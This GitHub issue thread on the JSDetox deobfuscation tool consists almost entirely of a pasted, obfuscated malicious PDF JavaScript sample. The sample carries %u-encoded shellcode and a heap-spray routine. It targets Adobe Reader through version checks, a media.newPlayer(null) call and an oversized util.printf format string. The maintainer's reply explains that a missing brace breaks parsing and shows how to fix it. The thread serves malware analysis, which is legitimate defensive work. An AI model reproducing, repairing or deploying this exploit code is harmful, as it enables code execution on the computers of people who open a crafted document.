### ISSUE TITLE
Parsing Javascript issue.

### ISSUE THREAD

**Issue by ZSSchulze** [svent/jsdetox#20]
Issue Parsing this Javascript

`var ev = 'yeegsgvsssaglh';var m;var mm;mmmm = "lll0a0alll0a0a";mmmmm = "lll0a0alll0a0alll0a0alll0a0alll0a0alll0a0alll0a0alll0a0alll4478lll4a75lll6457lll6865lll5846lll496blll4d6blll4373lll6756lll5a58lll575alll7856lll4b54lll5858lll6543lll7474lll7273lll4153lll4b4elll6e70lll516flll4345lll7870lll624clll7456lll6e72lll4743lll4b4d";var mmmmmm;var mmmmmmmmm;var mmmmmmmmmm;app[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('m = ap'+'p[\'ev\'+\'\'+\'al\'];');app[ev.charAt(2)+ev.charAt(6)+ev.charAt(10)+ev.charAt(12)]('mm=une'+'sca'/**/+/**/'pe;');mmmmmmmmmmmmmmmmmmm = '\r\nfunction xoxo()\r\n{\r\nreturn \"yyy%yyyuyyy0yyydyyyeyyybyyy%yyyuyyy4yyy9yyy5yyy9yyy%yyyuyyy8yyy0yyy4yyy1yyy%yyyuyyy6yyy7yyy3yyy1yyy%yyyuyyy3yyy9yyy8yyy0yyy%yyyuyyy7yyy5yyy9yyy0yyy%yyyuyyyeyyybyyyfyyy7yyy%yyyuyyyeyyy8yyy0yyy5yyy%yyyuyyyfyyyfyyyeyyyeyyy%yyyuyyyfyyyfyyyfyyyfyyy%yyyuyyy4yyy6yyy0yyydyyy%yyyuyyy6yyy7yyy0yyyfyyy%yyyuyyy6yyy6yyy1yyy1yyy%yyyuyyy0yyyfyyy6yyy7yyy%yyyuyyy0yyy3yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy6yyy%yyyuyyy6yyy7yyy0yyyfyyy%yyyuyyy6yyy7yyy7yyy5yyy%yyyuyyy0yyyfyyy6yyy7yyy%yyyuyyy9yyy7yyyfyyy1yyy%yyyuyyy6yyy7yyy6yyy6yyy%yyyuyyy4yyy6yyy0yyyfyyy%yyyuyyy6yyy6yyy1yyy1yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyy0yyyfyyy6yyy7yyy%yyyuyyy0yyy1yyydyyy0yyy%yyyuyyy6yyy7yyy6yyy4yyy%yyyuyyy9yyybyyy3yyy3yyy%yyyuyyyfyyy4yyy0yyyfyyy%yyyuyyy8yyy3yyy5yyy5yyy%yyyuyyy0yyyfyyyfyyy3yyy%yyyuyyyeyyyayyyayyy3yyy%yyyuyyy1yyy3yyy7yyy8yyy%yyyuyyydyyy5yyy0yyyfyyy%yyyuyyy6yyy8yyy5yyy1yyy%yyyuyyy0yyyfyyy7yyy4yyy%yyyuyyy0yyy1yyy3yyy0yyy%yyyuyyy9yyy8yyy6yyyayyy%yyyuyyy3yyy6yyy0yyyfyyy%yyyuyyycyyy5yyy4yyy8yyy%yyyuyyy0yyyfyyy6yyy6yyy%yyyuyyy8yyy5yyy5yyyeyyy%yyyuyyyeyyy4yyy1yyyayyy%yyyuyyyeyyy8yyy0yyyfyyy%yyyuyyy7yyyfyyy9yyy5yyy%yyyuyyy0yyyfyyy0yyy6yyy%yyyuyyydyyy9yyy2yyy4yyy%yyyuyyybyyycyyycyyybyyy%yyyuyyy8yyyayyy0yyyfyyy%yyyuyyy9yyy8yyycyyy8yyy%yyyuyyy0yyyfyyydyyy3yyy%yyyuyyy4yyy5yyycyyyeyyy%yyyuyyycyyy6yyyfyyyeyyy%yyyuyyyeyyy9yyy0yyyfyyy%yyyuyyy6yyydyyy7yyy4yyy%yyyuyyy0yyyfyyycyyybyyy%yyyuyyyeyyy0yyyfyyycyyy%yyyuyyy8yyy2yyyeyyycyyy%yyyuyyy9yyy3yyyeyyycyyy%yyyuyyy1yyy9yyyeyyyayyy%yyyuyyy5yyy4yyybyyy7yyy%yyyuyyydyyy0yyybyyycyyy%yyyuyyy4yyycyyy6yyy3yyy%yyyuyyy3yyy3yyy8yyy4yyy%yyyuyyybyyy5yyy5yyy4yyy%yyyuyyyeyyycyyy0yyy3yyy%yyyuyyy5yyy7yyy3yyydyyy%yyyuyyy2yyycyyyeyyycyyy%yyyuyyyeyyycyyy6yyybyyy%yyyuyyy7yyybyyy2yyyeyyy%yyyuyyy6yyyeyyyeyyycyyy%yyyuyyy0yyyeyyyeyyycyyy%yyyuyyycyyyayyy6yyyfyyy%yyyuyyyeyyycyyy0yyy7yyy%yyyuyyy5yyybyyy2yyy2yyy%yyyuyyy2yyybyyyeyyycyyy%yyyuyyy1yyyfyyy6yyy2yyy%yyyuyyyayyyayyy6yyy4yyy%yyyuyyy3yyyeyyyeyyycyyy%yyyuyyy6yyy4yyy4yyy7yyy%yyyuyyy5yyy4yyybyyyayyy%yyyuyyy2yyy0yyy9yyy8yyy%yyyuyyy5yyy3yyyeyyycyyy%yyyuyyy6yyy4yyydyyycyyy%yyyuyyyfyyyeyyy9yyy2yyy%yyyuyyydyyy9yyy6yyy8yyy%yyyuyyy5yyydyyy6yyy1yyy%yyyuyyy1yyy3yyyayyy3yyy%yyyuyyyayyy6yyy6yyyfyyy%yyyuyyy6yyy0yyyayyydyyy%yyyuyyybyyy7yyy6yyy4yyy%yyyuyyy8yyycyyy2yyy1yyy%yyyuyyy5yyycyyy9yyy6yyy%yyyuyyy4yyy3yyy3yyy3yyy%yyyuyyy1yyy2yyy7yyybyyy%yyyuyyyeyyycyyy8yyy3yyy%yyyuyyy4yyy3yyy3yyyeyyy%yyyuyyybyyyayyy6yyy4yyy%yyyuyyyeyyycyyy0yyy1yyy%yyyuyyy1yyycyyy5yyybyyy%yyyuyyy3yyyeyyyeyyycyyy%yyyuyyy6yyy4yyy7yyybyyy%yyyuyyy6yyy4yyybyyyayyy%yyyuyyydyyycyyy4yyybyyy%yyyuyyy3yyy8yyyfyyy2yyy%yyyuyyy3yyy0yyycyyycyyy%yyyuyyy5yyyayyy0yyy6yyy%yyyuyyy5yyy5yyyfyyy4yyy%yyyuyyyfyyy3yyy8yyy3yyy%yyyuyyydyyy2yyy1yyy2yyy%yyyuyyy2yyy0yyyeyyycyyy%yyyuyyyeyyy4yyy9yyybyyy%yyyuyyy6yyy2yyyayyy7yyy%yyyuyyy2yyy0yyyeyyyeyyy%yyyuyyyeyyycyyy9yyybyyy%yyyuyyy8yyybyyy2yyy0yyy%yyyuyyyayyy7yyyeyyy4yyy%yyyuyyyeyyyeyyy6yyy2yyy%yyyuyyy8yyybyyy2yyy0yyy%yyyuyyy8yyybyyyeyyy6yyy%yyyuyyy6yyyfyyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy8yyybyyyeyyycyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyy5yyy4yyybyyy7yyy%yyyuyyy5yyy4yyyayyyeyyy%yyyuyyyeyyy7yyybyyycyyy%yyyuyyy5yyydyyy5yyyfyyy%yyyuyyy6yyy6yyy1yyy2yyy%yyyuyyy2yyy6yyy2yyy4yyy%yyyuyyy5yyybyyyeyyy7yyy%yyyuyyy5yyydyyy6yyyfyyy%yyyuyyy9yyyeyyy1yyy2yyy%yyyuyyyeyyy4yyy2yyy4yyy%yyyuyyy6yyy5yyy9yyycyyy%yyyuyyy9yyy4yyy1yyy2yyy%yyyuyyy6yyy4yyy2yyyeyyy%yyyuyyyeyyyeyyyayyy6yyy%yyyuyyy6yyy7yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy6yyy%yyyuyyy5yyy4yyy6yyy7yyy%yyyuyyy2yyy6yyyayyyeyyy%yyyuyyy5yyybyyyeyyy7yyy%yyyuyyy4yyy5yyy6yyyfyyy%yyyuyyy9yyyeyyy1yyy2yyy%yyyuyyy6yyy3yyyayyy1yyy%yyyuyyy6yyy7yyy6yyyfyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyyeyyy7yyy0yyyfyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyy0yyydyyy6yyy4yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyy0yyyfyyy6yyy4yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy7yyy6yyy7yyy%yyyuyyydyyy2yyyeyyycyyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy8yyyfyyy3yyy1yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy4yyy3yyyfyyy%yyyuyyy6yyyayyyayyy7yyy%yyyuyyy3yyy2yyy3yyy7yyy%yyyuyyy8yyybyyyeyyycyyy%yyyuyyy2yyy0yyyeyyycyyy%yyyuyyy9yyy8yyy9yyybyyy%yyyuyyyeyyyeyyy8yyy7yyy%yyyuyyy5yyy3yyy2yyy0yyy%yyyuyyy0yyyfyyy3yyy2yyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyyeyyyayyy8yyyfyyy%yyyuyyy6yyy7yyydyyy2yyy%yyyuyyy6yyy7yyy6yyy6yyy%yyyuyyy3yyy1yyy6yyy7yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy9yyy8yyy3yyy2yyy%yyyuyyybyyyfyyy3yyy0yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy5yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyyfyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy3yyy1yyy2yyy7yyy%yyyuyyy6yyy7yyy8yyyfyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy3yyyfyyy6yyy7yyy%yyyuyyyayyy7yyyeyyy4yyy%yyyuyyy3yyy7yyy6yyyayyy%yyyuyyyeyyycyyy3yyy2yyy%yyyuyyyeyyycyyy8yyybyyy%yyyuyyy9yyybyyy2yyy0yyy%yyyuyyy8yyy7yyy9yyy8yyy%yyyuyyy9yyyfyyyeyyy4yyy%yyyuyyy6yyy8yyy6yyy7yyy%yyyuyyy0yyy8yyyeyyy9yyy%yyyuyyy6yyy7yyy6yyy5yyy%yyyuyyyeyyyeyyy6yyy7yyy%yyyuyyy6yyy7yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyyeyyycyyy6yyy7yyy%yyyuyyy2yyy3yyy3yyy8yyy%yyyuyyy1yyy0yyyeyyycyyy%yyyuyyy0yyydyyy5yyy3yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyy3yyy4yyy6yyy7yyy%yyyuyyy9yyy8yyy3yyy1yyy%yyyuyyy8yyy7yyy3yyy0yyy%yyyuyyy3yyy8yyyeyyycyyy%yyyuyyyayyy0yyy2yyyfyyy%yyyuyyy6yyy3yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy3yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyyeyyyayyy6yyy7yyy%yyyuyyy6yyy7yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy0yyy%yyyuyyy3yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy0yyyfyyy%yyyuyyy6yyy7yyy6yyy3yyy%yyyuyyyeyyyayyy6yyy7yyy%yyyuyyy6yyy7yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy5yyy%yyyuyyy3yyy7yyy6yyy7yyy%yyyuyyy1yyy0yyyeyyycyyy%yyyuyyy3yyy1yyy5yyy3yyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyyeyyycyyy9yyy3yyy%yyyuyyy4yyyayyyayyy4yyy%yyyuyyy6yyy3yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyyfyyyeyyy4yyy%yyyuyyy1yyy8yyy6yyy7yyy%yyyuyyyeyyyeyyy6yyy1yyy%yyyuyyy6yyy3yyyfyyyayyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy5yyy4yyy6yyy7yyy%yyyuyyyeyyyayyyayyyeyyy%yyyuyyy6yyyayyydyyy3yyy%yyyuyyy6yyy5yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy5yyy5yyycyyybyyy%yyyuyyyayyy7yyyayyy6yyy%yyyuyyy6yyy4yyyayyyfyyy%yyyuyyy9yyydyyyeyyy0yyy%yyyuyyydyyybyyyeyyyayyy%yyyuyyy6yyy7yyy6yyyayyy%yyyuyyy6yyy7yyy6yyy5yyy%yyyuyyycyyydyyy6yyy7yyy%yyyuyyy9yyydyyyeyyy0yyy%yyyuyyy5yyycyyy2yyy6yyy%yyyuyyy6yyy3yyyeyyyayyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy1yyy2yyy6yyy7yyy%yyyuyyy0yyydyyybyyy9yyy%yyyuyyyeyyyayyy6yyy7yyy%yyyuyyy6yyy3yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy0yyy%yyyuyyy3yyy7yyy6yyy7yyy%yyyuyyydyyy2yyy9yyy8yyy%yyyuyyy6yyy1yyy6yyy3yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy2yyyeyyyayyy%yyyuyyy6yyy5yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyy8yyy3yyy7yyy%yyyuyyy6yyy7yyydyyy2yyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy9yyy8yyy6yyy7yyy%yyyuyyy9yyyfyyy3yyy0yyy%yyyuyyy8yyycyyyeyyy6yyy%yyyuyyy6yyy3yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyycyyyeyyy4yyy%yyyuyyy1yyy8yyy6yyy7yyy%yyyuyyy9yyy8yyyeyyy3yyy%yyyuyyy6yyy7yyydyyy2yyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy9yyy8yyy6yyy7yyy%yyyuyyy9yyy7yyy3yyy0yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyydyyy2yyyeyyyayyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy8yyyfyyy3yyy1yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy4yyy3yyyfyyy%yyyuyyy6yyyayyyayyy7yyy%yyyuyyy3yyy2yyy3yyy7yyy%yyyuyyy8yyybyyyeyyycyyy%yyyuyyy2yyy0yyyeyyycyyy%yyyuyyy9yyy8yyy8yyybyyy%yyyuyyy0yyydyyy8yyy7yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyy9yyy8yyy6yyy7yyy%yyyuyyy2yyybyyy1yyy0yyy%yyyuyyy1yyy0yyy9yyy8yyy%yyyuyyy9yyy8yyy5yyy3yyy%yyyuyyy8yyy7yyy3yyy0yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyyeyyy2yyyeyyyayyy%yyyuyyy6yyy0yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyy8yyy3yyy7yyy%yyyuyyy3yyy7yyy1yyy0yyy%yyyuyyyeyyy2yyyeyyyayyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyy8yyy3yyy7yyy%yyyuyyy5yyy3yyy1yyy0yyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyy5yyy4yyy9yyy3yyy%yyyuyyy2yyy7yyyayyy7yyy%yyyuyyy1yyybyyyeyyy7yyy%yyyuyyy6yyy7yyy6yyy2yyy%yyyuyyy1yyy2yyy6yyy7yyy%yyyuyyyeyyycyyy9yyyfyyy%yyyuyyy3yyy7yyy2yyy8yyy%yyyuyyy9yyycyyyeyyy0yyy%yyyuyyy1yyybyyyeyyyayyy%yyyuyyy6yyy7yyy6yyy2yyy%yyyuyyydyyy2yyyeyyyayyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyycyyy3yyy9yyy4yyy%yyyuyyy9yyycyyyeyyy0yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy5yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyyfyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyyayyy2yyy7yyy%yyyuyyy6yyy7yyy0yyyayyy%yyyuyyy8yyyfyyy3yyy2yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy4yyy3yyyfyyy%yyyuyyy6yyyayyyayyy7yyy%yyyuyyy3yyy2yyy3yyy7yyy%yyyuyyy8yyybyyyeyyycyyy%yyyuyyy2yyy0yyyeyyycyyy%yyyuyyy9yyy8yyy9yyybyyy%yyyuyyyeyyy4yyy8yyy7yyy%yyyuyyy6yyy7yyy9yyyfyyy%yyyuyyyeyyy9yyy6yyy8yyy%yyyuyyy6yyy6yyy5yyybyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy2yyyeyyyeyyy%yyyuyyy6yyy1yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy3yyy8yyyeyyycyyy%yyyuyyyeyyycyyy5yyybyyy%yyyuyyy5yyy3yyy1yyy0yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy3yyy1yyy3yyy4yyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyyeyyycyyy8yyy7yyy%yyyuyyy2yyy7yyy3yyy8yyy%yyyuyyyeyyy2yyyayyy0yyy%yyyuyyy6yyy1yyy6yyy3yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy6yyy3yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyyeyyy2yyyeyyyayyy%yyyuyyy6yyy0yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy0yyyfyyy3yyy7yyy%yyyuyyy6yyy3yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy2yyyeyyyayyy%yyyuyyy6yyy5yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy3yyy1yyy3yyy7yyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyyeyyycyyy9yyy3yyy%yyyuyyy4yyyayyyayyy4yyy%yyyuyyy6yyy3yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyyfyyyeyyy4yyy%yyyuyyy1yyy8yyy6yyy7yyy%yyyuyyyeyyyeyyy6yyy1yyy%yyyuyyy6yyy3yyyfyyyayyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyyeyyyayyy6yyy7yyy%yyyuyyy6yyy3yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy0yyy%yyyuyyy3yyy7yyy6yyy7yyy%yyyuyyydyyy2yyy9yyy8yyy%yyyuyyy6yyy1yyy6yyy3yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy2yyyeyyyayyy%yyyuyyy6yyy5yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyy8yyy3yyy7yyy%yyyuyyy6yyy7yyydyyy2yyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy9yyy8yyy6yyy7yyy%yyyuyyy9yyyfyyy3yyy0yyy%yyyuyyy8yyycyyyeyyy6yyy%yyyuyyy6yyy3yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy9yyycyyyeyyy4yyy%yyyuyyy1yyy8yyy6yyy7yyy%yyyuyyy9yyy8yyycyyycyyy%yyyuyyy6yyy7yyydyyy2yyy%yyyuyyy6yyy7yyy6yyy1yyy%yyyuyyy9yyy8yyy6yyy7yyy%yyyuyyy9yyy7yyy3yyy0yyy%yyyuyyydyyy2yyyeyyyayyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy0yyyfyyy%yyyuyyy6yyy7yyy6yyy6yyy%yyyuyyy3yyy1yyy6yyy7yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyyayyy1yyybyyybyyy%yyyuyyy9yyy8yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy4yyy5yyy6yyy7yyy%yyyuyyyayyyeyyy5yyy4yyy%yyyuyyyeyyy7yyy2yyy6yyy%yyyuyyy6yyyayyydyyybyyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy1yyy2yyy6yyy7yyy%yyyuyyyayyy0yyy9yyy2yyy%yyyuyyy6yyyayyyeyyy3yyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy4yyy7yyy4yyy5yyy%yyyuyyy1yyy4yyy4yyy8yyy%yyyuyyyayyy6yyyeyyy4yyy%yyyuyyy0yyy1yyy6yyy3yyy%yyyuyyyeyyy3yyyayyy0yyy%yyyuyyy6yyy7yyy6yyyayyy%yyyuyyy6yyy7yyy6yyy6yyy%yyyuyyy4yyy7yyy6yyy7yyy%yyyuyyyeyyy4yyy4yyy5yyy%yyyuyyy6yyy5yyyayyy6yyy%yyyuyyy9yyycyyyeyyy0yyy%yyyuyyybyyy5yyy5yyy4yyy%yyyuyyy1yyy3yyyeyyyayyy%yyyuyyy6yyy7yyy7yyy2yyy%yyyuyyyeyyyayyycyyybyyy%yyyuyyy6yyyayyydyyybyyy%yyyuyyy6yyy6yyy6yyy7yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy2yyy6yyycyyydyyy%yyyuyyy5yyybyyy2yyy5yyy%yyyuyyy1yyy2yyy6yyy7yyy%yyyuyyy2yyyeyyy8yyyayyy%yyyuyyyeyyy3yyyayyy1yyy%yyyuyyy6yyy7yyy6yyyayyy%yyyuyyy6yyy7yyy6yyy6yyy%yyyuyyy4yyy5yyy6yyy7yyy%yyyuyyyeyyy2yyyayyy0yyy%yyyuyyy6yyy7yyy8yyycyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy2yyyayyy2yyy4yyy%yyyuyyy4yyy9yyy2yyy3yyy%yyyuyyyeyyy2yyyayyy0yyy%yyyuyyy6yyy7yyy8yyy8yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy3yyyfyyy2yyy2yyy%yyyuyyy4yyy7yyy2yyy2yyy%yyyuyyyayyy0yyy0yyy1yyy%yyyuyyy9yyy4yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy4yyy8yyy6yyy7yyy%yyyuyyyayyy1yyy0yyy4yyy%yyyuyyy9yyy2yyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy4yyy7yyy6yyy7yyy%yyyuyyyeyyy2yyyayyy0yyy%yyyuyyy6yyy7yyy9yyy1yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy0yyy6yyy1yyy3yyy%yyyuyyy0yyycyyy1yyy4yyy%yyyuyyyeyyy2yyyayyy0yyy%yyyuyyy6yyy7yyy9yyydyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy0yyyeyyy0yyybyyy%yyyuyyy1yyy3yyy1yyy4yyy%yyyuyyyeyyy2yyyayyy1yyy%yyyuyyy6yyy7yyy9yyy9yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyyeyyy0yyy4yyy1yyy%yyyuyyyeyyyayyy9yyycyyy%yyyuyyy8yyycyyyeyyy2yyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy0yyydyyy6yyy7yyy%yyyuyyy3yyy7yyy6yyy7yyy%yyyuyyy6yyy7yyy8yyyfyyy%yyyuyyy6yyy7yyy6yyy7yyy%yyyuyyy3yyyfyyy6yyy7yyy%yyyuyyyayyy7yyyeyyy4yyy%yyyuyyy3yyy7yyy6yyyayyy%yyyuyyyeyyycyyy3yyy2yyy%yyyuyyyeyyycyyy8yyybyyy%yyyuyyy8yyybyyy2yyy0yyy%yyyuyyy8yyy7yyy9yyy8yyy%yyyuyyy6yyy7yyy0yyydyyy%yyyuyyy9yyy8yyy0yyydyyy%yyyuyyy3yyy0yyy9yyy8yyy%yyyuyyyfyyy7yyy8yyy3\";\r\n}\r\nmmmmmm = mm(xoxo());';m("var mmmmmmmmmmmmmmmmmmmmmmmm0 = mmmmmmmmmmmmmmmmmmm.re"+"pla"+"ce(/[y]/g,'');");for(mmmmmmmmmmmmmmmmmmmmmm = 0; mmmmmmmmmmmmmmmmmmmmmm < 0x64; mmmmmmmmmmmmmmmmmmmmmm++) {   var mmmmmmmmmmmmmmmmmmmmm = 'function a1106889858(fa) {return fa;} var a266415535 = 281772104;function a454936894(fa) {return fa;} var a289990746 = 1206395987;function a606709841(fa) {return fa;} var a814629542 = 809599932;function a975519308(fa) {return fa;} var a73837795 = 418139819;function a1311395772(fa) {return fa;} var a102714415 = 1168743178;function a457025328(fa) {return fa;} var a106369175 = 824445897;';  var mmmmmmmmmmmmmmmmmmmmm = mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm;  var mmmmmmmmmmmmmmmmmmmmm = mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm+mmmmmmmmmmmmmmmmmmmmm;    var mmmmmmmmmmmmmmmmmmmmmmm = mmmmmmmmmmmmmmmmmmmmmm+1; mmmmmmmmmmmmmmmmmmmm = 'var mmmmmmmmmmmmmmmmmmmmmmmm'+mmmmmmmmmmmmmmmmmmmmmmm+'=mmmmmmmmmmmmmmmmmmmmmmmm'+mmmmmmmmmmmmmmmmmmmmmm+';'+mmmmmmmmmmmmmmmmmmmmm+''+mmmmmmmmmmmmmmmmmmmmm+''+mmmmmmmmmmmmmmmmmmmmm+'';    m(mmmmmmmmmmmmmmmmmmmm);}m(mmmmmmmmmmmmmmmmmmmmmmmm100);m('mmmm = ' + 'mmmm.re' /****/ + 'place' + '(/lll/g,"%25%75")'); m('mmmmm = ' + 'mmmmm.re' /****/ + 'place' + '(/lll/g,"%25%75")'); mmmmmmmmm = mm(mm(mmmm));mmmmmmmmmm = mm(mm(mmmmm));var mmmmmmmmmmm = app.viewerVersion.toString();try{ mmmmmmmmmmmm = 700; throw "688128";} catch(e){  mmmmmmm = Number(e);}try{   throw "523776"; } catch(e){ mmmmmmmm = Number(e);}if(mmmmmmmmmmm>=8.0){ try {       mmmmmmmmmmmm = 0x1000;      throw "32768";  } catch(e)  {       mmmmmmm = Number(e);    }   try {       throw "32256";  } catch(e)  mmmmmmmm = Number(e);   }}try { while(mmmmmmmmm.length <= (2 * mmmmmmm - mmmmmmmmm.length))     {       m(mm('mmmmmmmmm %2B= ' + 'mmmmmmmmm')); }   } catch(e) {}m(mm('mmmmmmmmm %3D mmmmmmmmm.subst' + 'ring(0, mmmmmmmm)'));mmmmmmmmmmmmm = new Array();for(mmmmmmmmmmmmmmmm = 0; mmmmmmmmmmmmmmmm < mmmmmmmmmmmm; mmmmmmmmmmmmmmmm++) {  m(mm('mmmmmmmmmmmmm[mmmmmmmmmmmmmmmm] = ' + 'mmmmmmmmm %2B mmmmmm'));}util.printd("zhFvZPRxwrcXQJVFALoWckjIlrYaLBnwVTJw", new Date());if(mmmmmmmmmmm >= 8.0){   util.printd("UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt", new Date());        var mmmmmmmmmmmmmm = mm("this.%20%20%20me"+/**/"dia.%20%20%20new"+/**/"Play"+/**/"er%28nu"+/**/"ll%29%3B");     try     {   m(mmmmmmmmmmmmmm);  } catch(e) {}       util.printd(mmmmmmmmmm, new Date());}if(mmmmmmmmmmm >= 7.0 && mmmmmmmmmmm < 8){ var mmmmmmmmmmmmmmmmmm = '12999999999999999999';    for(mmmmmmmmmmmmmmmmm = 0; mmmmmmmmmmmmmmmmm < 276; mmmmmmmmmmmmmmmmm++)    {       m(mm('mmmmmmmmmmmmmmmmmm %2B= ' + '%278%27'));  }       var mmmmmmmmmmmmmmm = mm("util.%20%20%20pr"+/**/"%69%6etf"+/**/"%28%22%25"+/**/"%34%35%30%30%30%66"+/**/"%22%2Cmmmmmmmmmmmmmmmmmm%29%3B");  m(mmmmmmmmmmmmmmm);}`

**Comment by svent** [comment]
Sorry for the late reply - as far as I see this, the Javascript is slightly broken: a `{` is missing before a catch block.
If you replace
`try { throw "32256"; } catch(e) mmmmmmmm = Number(e); }`
with
`try { throw "32256"; } catch(e) { mmmmmmmm = Number(e); }`
JSDetox can analyze the code.
